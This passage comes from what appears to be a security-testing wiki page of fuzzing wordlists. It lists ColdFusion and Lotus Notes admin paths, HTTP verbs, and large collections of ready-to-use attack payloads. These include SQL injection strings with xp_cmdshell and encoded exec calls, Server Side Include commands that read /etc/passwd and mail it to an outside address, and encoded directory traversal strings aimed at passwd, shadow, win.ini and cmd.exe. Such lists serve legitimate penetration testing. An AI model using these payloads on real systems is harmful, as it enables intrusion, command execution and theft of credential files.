.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
